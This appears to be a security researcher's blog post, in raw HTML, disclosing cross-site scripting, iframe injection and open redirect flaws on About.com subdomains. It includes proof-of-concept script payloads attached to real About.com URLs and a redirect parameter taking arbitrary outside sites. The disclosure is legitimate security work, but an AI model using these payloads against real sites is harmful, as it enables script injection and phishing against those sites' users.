<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">(1.3) Result of Exploiting XSS Attacks</span></b><br />
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><span style="font-family: Arial, Helvetica, sans-serif;">XSS may allow a remote attacker to create a specially crafted request that would execute arbitrary script code in a user's browser session within the trust relationship between their browser and the server. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">Base on Acunetix, exploited XSS is commonly used to achieve the following malicious results:</span><br />
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"> "Identity theft</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"> Accessing sensitive or restricted information</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"> Gaining free access to otherwise paid for content</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"> Spying on user’s web browsing habits</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"> Altering browser functionality</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"> Public defamation of an individual or corporation</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"> Web application defacement</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"> Denial of Service attacks (DOS)</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">" (Acunetix)</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">(1.4) Basics of Iframe Injection (Cross-frame-Scripting) Vulnerabilities</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">"In an XFS (Cross-frame-Scripting) attack, the attacker exploits a specific cross-frame-scripting bug in a web browser to access private data on a third-party website. The attacker induces the browser user to navigate to a web page the attacker controls; the attacker's page loads a third-party page in an HTML frame; and then JavaScript executing in the attacker's page steals data from the third-party page." (OWASP)</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">"XFS also sometimes is used to describe an XSS attack which uses an HTML frame in the attack. For example, an attacker might exploit a Cross Site Scripting Flaw to inject a frame into a third-party web page; or an attacker might create a page which uses a frame to load a third-party page with an XSS flaw." (OWASP)</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">(1.5) Basic of Open Redirect (Dest Redirect Privilege Escalation) Vulnerabilities</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">"An open redirect is an application that takes a parameter and redirects a user to the parameter value without any validation. This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it." (OWASP)</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Open redirect is listed in OWASP top 10. The general consensus of it is "avoiding such flaws is extremely important, as they are a favorite target of phishers trying to gain the user's trust."</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Several other similar products 0-day vulnerabilities have been found by some other bug hunter researchers before. CNN has patched some of them. "The Full Disclosure mailing list is a public forum for detailed discussion of vulnerabilities and exploitation techniques, as well as tools, papers, news, and events of interest to the community. FD differs from other security lists in its open nature and support for researchers' right to decide how to disclose their own discovered bugs. The full disclosure movement has been credited with forcing vendors to better secure their products and to publicly acknowledge and fix flaws rather than hide them. Vendor legal intimidation and censorship attempts are not tolerated here!" A great many of the following web securities have been published here, Injection, Broken Authentication and Session Management, Cross-Site Scripting (XSS), Insecure Direct Object References, Security Misconfiguration, Sensitive Data Exposure, Missing Function Level Access Control, Cross-Site Request Forgery (CSRF), Using Components with Known Vulnerabilities, Unvalidated Redirects and Forwards. It also publishes suggestions, advisories, solutions details related to XSS and URL Redirection vulnerabilities and cyber intelligence recommendations.</span><br />
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">(2) About Group About.com All Topics (At least 99.88% links) Vulnerable to XSS (Cross-Site Scripting) Security Attacks</span></b></div>
<div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Domain:</span></div>
<div>
<a href="http://www.about.com/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.about.com/</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability description:</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">A method was found to attack users of About.com based XSS attacks. </span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">All links under the topics of about.com can be used for this attack.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Just attach "/lr/" to any About.com's sub-domains. Then attach "any codes + sciript" or attach "script" code directly is OK. The structure is "<a href="http://subdomain.about.com/lr/*/script_code/*">http://subdomain.about.com/<wbr></wbr>lr/*/script_code/*</a>".</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">The vulnerability can be attacked without user login. Tests were performed on Mozilla Firefox (26.0) in Ubuntu (14.04) and Microsoft IE (9.0.15) in Windows 7.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-SLnx29JIMAA/VM97bOAmq6I/AAAAAAAAApg/ieERY3imK64/s1600/about_all_xss_1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="clear: left; color: black; float: left; font-family: Arial, Helvetica, sans-serif; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="251" src="http://4.bp.blogspot.com/-SLnx29JIMAA/VM97bOAmq6I/AAAAAAAAApg/ieERY3imK64/s400/about_all_xss_1.png" width="400" /></span></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-MBV2Ka-nNrk/VM97bOIghQI/AAAAAAAAApQ/gI4iuvA02EY/s1600/about_all_xss_2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="clear: left; color: black; float: left; font-family: Arial, Helvetica, sans-serif; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="251" src="http://3.bp.blogspot.com/-MBV2Ka-nNrk/VM97bOIghQI/AAAAAAAAApQ/gI4iuvA02EY/s400/about_all_xss_2.png" width="400" /></span></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<a href="https://2.bp.blogspot.com/-qkY3b7MCFxE/VM97bEcGNCI/AAAAAAAAApU/dPwaxIAztbs/s1600/about_all_xss_4.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="252" src="http://2.bp.blogspot.com/-qkY3b7MCFxE/VM97bEcGNCI/AAAAAAAAApU/dPwaxIAztbs/s400/about_all_xss_4.png" width="400" /></a><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b>POC Codes, e.g.</b></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">/"><svg/onload=alert(/<wbr></wbr>justqdjing/)></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://ipod.about.com/lr/ipad_how-tos/9033" target="_blank">http://ipod.about.com/lr/ipad_<wbr></wbr>how-tos/9033</a>"><svg/onload=<wbr></wbr>alert(/justqdjing/)></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://bizfinance.about.com/lr/businesscredit/fl/5-Ways-to-Start-Establishing-Business-Identity-Theft-Protection.htm/" target="_blank">http://bizfinance.about.com/<wbr></wbr>lr/businesscredit/fl/5-Ways-<wbr></wbr>to-Start-Establishing-<wbr></wbr>Business-Identity-Theft-<wbr></wbr>Protection.htm/</a>"><svg/onload=<wbr></wbr>alert(/justqdjing/)></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://recycling.about.com/lr/Collecting/ss/EPS-Recycling-5-Reasons-Why-and-2-Why-Not.htm/" target="_blank">http://recycling.about.com/lr/<wbr></wbr>Collecting/ss/EPS-Recycling-5-<wbr></wbr>Reasons-Why-and-2-Why-Not.htm/</a><wbr></wbr>"><svg/onload=alert(/<wbr></wbr>justqdjing/)></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://dc.about.com/lr/shopping/a/BlkFriday.htm/" target="_blank">http://dc.about.com/lr/<wbr></wbr>shopping/a/BlkFriday.htm/</a>"><<wbr></wbr>svg/onload=alert(/justqdjing/)<wbr></wbr>></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://healthtech.about.com/lr/Patient-Portals/fl/5-Ways-a-Patient-Portal-Can-Improve-Your-Health-Care-Experience.htm/" target="_blank">http://healthtech.about.com/<wbr></wbr>lr/Patient-Portals/fl/5-Ways-<wbr></wbr>a-Patient-Portal-Can-Improve-<wbr></wbr>Your-Health-Care-Experience.<wbr></wbr>htm/</a>"><svg/onload=alert(/<wbr></wbr>justqdjing/)></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">POC Video:</span></b></div>
<div>
<a href="https://www.youtube.com/watch?v=h5yELiJBxWo&feature=youtu.be"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.youtube.com/watch?v=h5yELiJBxWo&feature=youtu.be</span></a><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
</div>
<div>
</div>
<div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Blog Detail:</span></b></div>
<a href="http://securityrelated.blogspot.com/2015/02/about-group-aboutcom-all-topics-at_2.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://securityrelated.blogspot.com/2015/02/about-group-aboutcom-all-topics-at_2.html</span></a></div>
<div>
<a href="http://tetraph.com/security/xss-vulnerability/about-group-about-com-all-topics-at-least-99-88-links-vulnerable-to-xss-cross-site-scripting-security-attacks/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://tetraph.com/security/xss-vulnerability/about-group-about-com-all-topics-at-least-99-88-links-vulnerable-to-xss-cross-site-scripting-security-attacks/</span></a></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">(3) About Group About.com Main Page's Search Field XSS (Cross-Site Scripting) Security Vulnerabilities</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability description:</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">The web application About.com online website has a security bug problem. It can be exploited by XSS attacks.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">The code programming flaw occurs at about.com main page's search field, e.g.</span></div>
<div>
<a href="http://www.about.com/?q=googleandroidsystem" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.about.com/?q=<wbr></wbr>googleandroidsystem</span></a><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-LSf9LYXqz_g/VM9tHiZBFII/AAAAAAAAAog/M5TGcIqyWWs/s1600/about_search_xss1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="clear: left; color: black; float: left; font-family: Arial, Helvetica, sans-serif; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="253" src="http://3.bp.blogspot.com/-LSf9LYXqz_g/VM9tHiZBFII/AAAAAAAAAog/M5TGcIqyWWs/s400/about_search_xss1.png" width="400" /></span></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b>POC Codes, e.g.</b></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">"--/>"><img src=x onerror=prompt(/justqdjing/)></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://www.about.com/?q=" target="_blank">http://www.about.com/?q=</a>"--/>"<wbr></wbr>><img src=x onerror=prompt(/justqdjing/)></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">POC Video:</span></b></div>
<div>
<a href="https://www.youtube.com/watch?v=H4G7b_Jkqvw&feature=youtu.be"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.youtube.com/watch?v=H4G7b_Jkqvw&feature=youtu.be</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Blog Details:</span></b></div>
<div>
<a href="http://tetraph.com/security/xss-vulnerability/about-group-about-com-main-pages-search-field-xss-cross-site-scripting-security-vulnerabilities/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://tetraph.com/security/xss-vulnerability/about-group-about-com-main-pages-search-field-xss-cross-site-scripting-security-vulnerabilities/</span></a></div>
<div>
<a href="http://securitypitch.com/about-group-about-com-content-network-vulnerable-to-xss-iframe-injection-security-attacks-433/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://securitypitch.com/about-group-about-com-content-network-vulnerable-to-xss-iframe-injection-security-attacks-433/</span></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://securityrelated.blogspot.com/2015/02/about-group-aboutcom-main-pages-search.html">http://securityrelated.blogspot.com/2015/02/about-group-aboutcom-main-pages-search.html</a></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(4) </b><b style="line-height: 19.911111831665px; text-align: justify;">About Group About.com All Topics (At least 99.88% links) Vulnerable to Iframe Injection (Cross Frame Scripting) Security Attacks</b></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability description:</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">About Group has a security problem. It can be exploited by Iframe Injection (Cross Frame Scripting) attacks.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">The vulnerability occurs at about.com "offsite.htm" page with "zu" parameter, e.g.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://internationalinvest.about.com/gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//facebook.com/yahoo" target="_blank">http://internationalinvest.<wbr></wbr>about.com/gi/dynamic/offsite.<wbr></wbr>htm?zi=1/XJ/Ya&sdn=<wbr></wbr>internationalinvest&cdn=prep&<wbr></wbr>tm=2&f=21&tt=14&bt=0&bts=1&zu=<wbr></wbr>http%3A//facebook.com/yahoo</a></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Use "<a href="http://whitehatpost.blog.163.com/" target="_blank">http://whitehatpost.blog.163.<wbr></wbr>com/</a>" for the following test.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">The vulnerabilities can be attacked without user login. Tests were performed on Microsoft IE (10.0.9200.16750) of Windows 8, Mozilla Firefox (34.0) & Google Chromium 39.0.2171.65-0 ubuntu0.14.04.1.1064 (64-bit) of Ubuntu (14.04),Apple Safari 6.1.6 of Mac OS X Lion 10.7. </span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-v3QkmmHTbDk/VM93CrcadWI/AAAAAAAAApI/DespTZWcrTI/s1600/about_international_iframe_jnjection.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><br /></span></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-0Ojsly_n3-I/VM9_X_lDYuI/AAAAAAAAAps/3zUwqJ4Bmtg/s1600/about_inframe_injection.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="clear: left; color: black; float: left; font-family: Arial, Helvetica, sans-serif; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="253" src="http://4.bp.blogspot.com/-0Ojsly_n3-I/VM9_X_lDYuI/AAAAAAAAAps/3zUwqJ4Bmtg/s400/about_inframe_injection.png" width="400" /></span></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="clear: left; color: black; float: left; font-family: Arial, Helvetica, sans-serif; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="253" src="http://1.bp.blogspot.com/-v3QkmmHTbDk/VM93CrcadWI/AAAAAAAAApI/DespTZWcrTI/s400/about_international_iframe_jnjection.png" width="400" /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable URLs:</span></b></div>
<div>
<a href="http://homerenovations.about.com/od/fundingyourrenovation/tp/8-Remodels-That-Maximize-Curb-Appeal-For-Higher-Selling-Price.htm" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://homerenovations.about.<wbr></wbr>com/od/fundingyourrenovation/<wbr></wbr>tp/8-Remodels-That-Maximize-<wbr></wbr>Curb-Appeal-For-Higher-<wbr></wbr>Selling-Price.htm</span></a></div>
<div>
<a href="http://publishing.about.com/od/Childrens-and-YA-Books/fl/A-Literary-linkedin-Agents-ebay-Advice-Hao123-to-Childrens-and-Bing-Sohu-YA-Dailymail-Authors-Snapdeal.htm" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://publishing.about.com/<wbr></wbr>od/Childrens-and-YA-Books/fl/<wbr></wbr>A-Literary-linkedin-Agents-<wbr></wbr>ebay-Advice-Hao123-to-<wbr></wbr>Childrens-and-Bing-Sohu-YA-<wbr></wbr>Dailymail-Authors-Snapdeal.htm</span></a></div>
<div>
<a href="http://chinesefood.about.com/od/chickenrecipes/tp/chicken-stir-fry-flipkart-adobe-alipay-pork-dropbox-blogger-github-jd-chinadaily-huffingtonpost-Livedoor-Buzzfeed-Themeforest-Godaddy.htm" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://chinesefood.about.com/<wbr></wbr>od/chickenrecipes/tp/chicken-<wbr></wbr>stir-fry-flipkart-adobe-<wbr></wbr>alipay-pork-dropbox-blogger-<wbr></wbr>github-jd-chinadaily-<wbr></wbr>huffingtonpost-Livedoor-<wbr></wbr>Buzzfeed-Themeforest-Godaddy.<wbr></wbr>htm</span></a></div>
<div>
<a href="http://menshair.about.com/od/facialhair/qt/growbeard-ask-360cn-mailru-gmw-googleleadservices-bbc-pornhub-peoplecn-rakuten-nicovideo-dailymotion-1-dmm-deviantart.htm/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://menshair.about.com/od/<wbr></wbr>facialhair/qt/growbeard-ask-<wbr></wbr>360cn-mailru-gmw-<wbr></wbr>googleleadservices-bbc-<wbr></wbr>pornhub-peoplecn-rakuten-<wbr></wbr>nicovideo-dailymotion-1-dmm-<wbr></wbr>deviantart.htm/</span></a></div>
<div>
